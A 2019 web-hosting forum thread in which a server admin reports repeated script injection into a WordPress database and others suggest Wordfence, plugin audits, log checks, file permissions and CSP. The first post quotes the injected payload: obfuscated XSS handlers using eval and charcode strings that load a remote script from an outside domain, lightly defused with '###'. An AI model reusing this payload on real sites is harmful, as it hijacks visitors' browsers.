Script injected to WP database

Discussion in 'Server Operation' started by Taleman, Oct 14, 2019.

  1. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    On my server there is one Wordpress site that has gotten several times now scripts injected in database. The script redirect browser to some unrelated site, perhaps cracker wants more traffic to that site or something. Also wordpress siteurl and home are changed, so browser goes to that other site.
    I have changed passwords and commanded users to be careful, but same thing happened this weekend. Any idea how this injection is done and possible?
    The code that is injected looks like this (I added those ### so it could not be executed by mistake):
    <img src=x onerror=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,   3316 115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,10   3316 1,110,100,67,104,105,108,100,40,116,41,125,40,41,59))><input autofocus onfocus=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,1   3316 16,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105   3316 ,108,100,40,116,41,125,40,41,59))><svg/onload=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,   3316 104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))
    I created a small program that removes those added strings, but it is a bother shutdown website and clean the database.
  2. elmacus

    elmacus Active Member

    You do have Wordfence installed ?
  3. till

    till Super Moderator Staff Member ISPConfig Developer

    The most likely reason is a vulnerable WP plugin. Check the access.log of the site for unusual requests and scan the website files for malware (just to be sure) that nothing got injected into files. In case you did not change the database password yet, change it trough ISPConfig and in the wp-config.php file, chmod the wp-config.php file so that it's only readable for the user of this website and not for other or for the website group.
  4. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    I told the website creator to install WordFence after the first incident. At least after that the wp-config.php has not been readable group and others.
    Reading the access log, it may be the incident happened 5th of October. That is a bit hard to believe, this website is used actively, surely this kind of attack would be discovered the same day.
    Anyway, reading access logs did not reveal to me any info on how the attack was made. Maybe the user has malware on his/her workstation that does this or steals passwords.
    I have now again changed all passwords related to this website, including ispconfig user password.
  5. Steini86

    Steini86 Active Member

  6. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    CSP looks interesting.
    Is there a reason Wordpress et al do not prevent writing <script> in the blog text? Or not sanitize the blog text when sending to website visitor?
    Could I write in this forum message with javascript embedded and get it executed on visitors browser?

Share This Page